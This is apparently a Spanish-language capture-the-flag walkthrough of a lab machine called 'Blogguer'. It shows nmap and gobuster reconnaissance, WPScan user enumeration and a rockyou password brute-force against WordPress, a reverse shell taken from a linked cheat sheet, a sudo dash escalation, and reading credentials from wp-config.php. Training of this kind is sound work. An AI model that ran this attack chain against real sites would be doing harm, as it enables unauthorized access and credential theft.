# Blogguer

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.68
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FaZummkk0p1ojGFwNZMLB%2Fimage.png?alt=media&#x26;token=56d0623b-a354-4ea5-85fd-ec47d9e2761c" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open 192.168.1.68 --min-rate 5000 -n
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FxJ6HXbIVzsQCsfc7XgpW%2Fimage.png?alt=media&#x26;token=5a340bdb-7fe3-4d51-9ebd-ea42ceec6f4c" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 192.168.1.68
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FXbPveyzRjJQLtOhOK7Nf%2Fimage.png?alt=media&#x26;token=e929a61e-9900-4e3a-b9a7-f539439f0384" alt=""><figcaption></figcaption></figure>

Miramos el puerto 80 en la que no hay nada relevante ya que es la página por defecto de Apache.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEHz59iQ2ccb68CfJr5Ol%2Fimage.png?alt=media&#x26;token=6e942115-e344-43da-8fe8-77f0564c92ad" alt=""><figcaption></figcaption></figure>

Buscamos directorios.

```bash
gobuster dir -u http://192.168.1.68 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

Nos llama la atención que hay un directorio llamado **/wordpress**. Ponemos el dominio **megablog.nyx** en **/etc/hosts**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBc0r2r7ceREGJbGtdOyE%2Fimage.png?alt=media&#x26;token=e67ed549-d66b-42e2-8408-9c6e5c8bf0da" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FUkiUYDOscn0pNhfLNjXC%2Fimage.png?alt=media&#x26;token=30a9eb6e-703d-4f99-ac64-6692ebac4d7d" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Al tener el directorio wp-admin sabemos que es un panel de login pero no tenemos las credenciales por lo que con **WPScan** enumeramos el usuario.

```bash
wpscan --url http://192.168.1.68/wordpress/ --enumerate u,vp
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FjNmNSfSX6TKFXPvaWjLV%2Fimage.png?alt=media&#x26;token=077ebc02-ab1e-419f-8e7c-9369190d9881" alt=""><figcaption></figcaption></figure>

Sabiendo el usuario tenemos que conseguir la contraseña.

```bash
wpscan --url http://192.168.1.68/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames peter
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F5VPKf4j3HlLZhjoaMgkc%2Fimage.png?alt=media&#x26;token=a462b97d-f888-45c0-96a0-ccace2f5f7e0" alt=""><figcaption></figcaption></figure>

Teniendo las credenciales nos logueamos.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGPkq8z8j7y4aB2ZQty82%2Fimage.png?alt=media&#x26;token=339a2685-1290-4a56-b390-cdd099f904fc" alt=""><figcaption></figcaption></figure>

{% @github-files/github-code-block url="<https://github.com/d4t4s3c/OffensiveReverseShellCheatSheet?tab=readme-ov-file&source=post_page-----18a0699dd483--------------------------------#wordpress>" %}

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FI87i69f1hORMjp3dWOcq%2Fimage.png?alt=media&#x26;token=21e1a98e-c84a-43ff-b830-71aa2a4632c1" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar más cómodos.

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.&#x20;

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FyFjBkhpwoCrQfSnztkNo%2Fimage.png?alt=media&#x26;token=04c14c3f-eb07-4d7f-b74e-47c37c1c8122" alt=""><figcaption></figcaption></figure>

{% embed url="<https://gtfobins.github.io/gtfobins/dash/#suid>" %}

<pre class="language-bash"><code class="lang-bash"><strong>sudo -u blog /usr/bin/dash -p
</strong></code></pre>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FSUOhQpmB4beB5laq6aMo%2Fimage.png?alt=media&#x26;token=61382d86-16eb-41f9-873c-9b676a2663ca" alt=""><figcaption></figcaption></figure>

Nos damos cuenta que no hemos revisado el archivo wp-config.php por si hay credenciales.

```bash
cat /var/www/html/wordpress/wp-config.php 
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FpyZLxQv7f6lutwDQxEun%2Fimage.png?alt=media&#x26;token=53090419-7436-49dd-b48c-b76849405977" alt=""><figcaption></figcaption></figure>

Teniendo las credenciales nos logueamos.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FnzyilHp5Y89s0hE2nb0j%2Fimage.png?alt=media&#x26;token=e1326709-f451-42c2-9b9b-e33dfcd22db4" alt=""><figcaption></figcaption></figure>